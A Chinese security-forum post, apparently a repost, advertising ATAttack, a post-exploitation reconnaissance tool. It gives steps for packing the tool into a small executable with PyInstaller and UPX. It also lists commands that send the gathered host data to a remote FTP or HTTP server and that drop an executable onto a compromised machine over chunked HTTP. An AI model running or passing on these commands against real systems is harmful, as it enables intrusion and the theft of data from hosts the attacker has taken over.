安全矩阵

 找回密码
 立即注册
搜索
查看: 545|回复: 0

后渗透半自动化侦察工具

[复制链接]

189

主题

191

帖子

903

积分

高级会员

Rank: 4

积分
903
发表于 2022-11-6 16:03:20 | 显示全部楼层 |阅读模式
后渗透半自动化侦察工具 (qq.com)


前言
每获取一台机器权限,如果每次都手动操作重复一样的信息收集工作,无疑加大了工作量,既为了能更好的获取内网进一步突破点攻击面,这段闲暇时间造了个简易的轮子,其在真实环境中发现较多未知问题,欢迎大家踊跃提交 issue 和 PR !

简介
ATAttack是一款后渗透半自动化侦察工具,它从进攻性和防御性安全角度执行许多面向安全性的主机调查“安全检查”。
编辑

打包ATAttack二进制文件
测试打包环境:


  1. Python 2.7.15
  2. PyInstaller 3.4
  3. Windows 10
复制代码


通过UPX压缩,使得ATAttack程序落地更小

  1. 下载UPX(测试环境为upx-3.95-win64版本)
  2. https://github.com/upx/upx/releases

  3. pip安装pyinstaller
  4. pip install pyinstaller

  5. 进入ATAttack目录,并通过upx压缩
  6. pyinstaller -F exploit.py --upx-dir=upx-3.95-win64

  7. 成功打包二进制控制台单文件\ATAttack\dist]\exploit.exe
复制代码


快照预览
Win10测试环境
编辑
Win2008测试环境:
编辑

使用方法
存储于本地临时文件夹:

           

python exploit.py
回传远程FTP服务器:

           

python exploit.py -t ftp_host -u ftp_user -p ftp_pwd
通过PUT请求回传http服务端

           

python exploit.py -d http://10.10.10.10:8000/
HTTP分块传输落地可执行文件

           

python http_client.py -d http://10.10.10.10./exploit.exe -u http://10.10.10.10:8000/

下载地址
点击下方名片进入公众号
回复关键字【1103】获取下载链接
编辑
Hack分享吧
专注分享优质安全项目和技术文章
4篇原创内容
公众号

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-29 02:33 , Processed in 0.013720 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表